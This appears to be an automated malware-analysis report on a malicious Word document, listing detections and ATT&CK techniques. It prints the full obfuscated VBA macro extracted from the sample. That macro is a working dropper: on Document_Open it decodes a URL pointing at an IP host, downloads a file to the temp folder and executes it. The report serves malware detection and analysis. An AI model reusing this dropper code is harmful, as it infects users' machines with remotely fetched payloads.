MALICIOUS
258
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros that attempt to download and execute a payload, as indicated by the 'OLE_VBA_HTTP_DROP_EXEC' heuristic. The document body explicitly prompts the user to 'enable content' to view the document, a typical social engineering tactic. The VBA macro code is heavily obfuscated, making it difficult to determine the exact payload or destination URL, but the overall intent is to download and execute a secondary stage.
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-6922941-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6922941-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ² = ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("microsoft.xmlhttp") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£ = Environ("tmp") + °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("\ZQFMâG¶TØ.ÂÛÂ") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8659 bytes |
SHA-256: 20bc4f5d23553c89ba474415df1a7f9fbccc3fbc9b7d54cb62c9ff07232ef186 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º)
¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
For i = 1 To Len(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º)
£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£® = InStr(¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢, Mid(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º, i, 1))
If £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£® > 0 Then
¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª = Mid(¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯, £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®, 1)
°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ + ¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª
Else
°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ + Mid(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º, i, 1)
End If
Next
°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿
End Function
Private Sub Document_Open()
Dim ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·
Set ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("microsoft.xmlhttp")
Dim ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£
Dim µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·
Set µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("Shell.Application")
¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£ = Environ("tmp") + °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("\ZQFMâG¶TØ.ÂÛÂ")
¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Open "GET", °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("hÖÖÓ://²00.6³.45.1²9/ÕÜÕÖÂm/âFF§ÅÒ_ÒÙÖÓÙÖ8â44à1F.ÂÛÂ"), False
¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.send
§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ² = ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.responseBody
If ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Status = 200 Then
Set ²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´ = CreateObject("adodb.stream")
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Open
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Type = 1
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Write §¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.SaveToFile ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£, 2
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Close
End If
µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Open (¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£)
End Sub
Attribute VB_Name = "NewMacros"
Sub dfafOrigin()
'
' dfafOrigin Macro
'
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.